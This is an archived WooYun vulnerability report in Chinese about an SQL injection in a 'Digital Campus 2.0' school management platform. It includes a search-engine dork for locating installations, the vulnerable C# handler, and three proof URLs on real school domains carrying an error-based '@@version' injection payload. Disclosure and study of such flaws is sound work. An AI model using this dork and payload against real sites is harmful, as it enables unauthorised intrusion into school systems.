当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0102946

漏洞标题:某数字化校园管理系统#SQL注入5

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2015-03-23 16:15

修复时间:2015-06-25 14:26

公开时间:2015-06-25 14:26

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-23: 细节已通知厂商并且等待厂商处理中
2015-03-27: 厂商已经确认,细节仅向厂商公开
2015-03-30: 细节向第三方安全合作伙伴开放
2015-05-21: 细节向核心白帽子及相关领域专家公开
2015-05-31: 细节向普通白帽子公开
2015-06-10: 细节向实习白帽子公开
2015-06-25: 细节向公众公开

简要描述:

RT

详细说明:

关键词:intitle:数字校园平台—Digital Campus2.0 Platform

1620261313db25e755b4a80d3f9159e02f766467.png


文件:code/system/securitymodule.aspx

private void GetModuleListByModuleID()
{
try
{
string request = base.GetRequest("id");
string request2 = base.GetRequest("modulename");
string text = string.Concat(new object[]
{
0,
",",
3,
",",
4
}).ToString();
string moduleListByModuleID = SecurityModuleManager.GetModuleListByModuleID(null, this.UserID.ToString(), this.UserType, text, request2, request);
base.Response.Clear();
base.Response.Write(moduleListByModuleID);
}
catch (Exception ex)
{
throw ex;
}
}

漏洞证明:

案例1:

http://www.lhdtxx.com/code/system/securitymodule.aspx?Method=GetModuleListByModuleID&id=1' and 1=@@version and '1'='1


2015-03-22_031406.png


案例2:

http://www.zxywx.com/code/system/securitymodule.aspx?Method=GetModuleListByModuleID&id=1' and 1=@@version and '1'='1


2015-03-22_031458.png


案例3:

http://yzcqxx.com/code/system/securitymodule.aspx?Method=GetModuleListByModuleID&id=1' and 1=@@version and '1'='1


2015-03-22_031541.png

修复方案:

过滤哦!

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-03-27 14:25

厂商回复:

CNVD确认所述漏洞情况,暂未建立与软件生产厂商的直接处置渠道,待认领。

最新状态:

暂无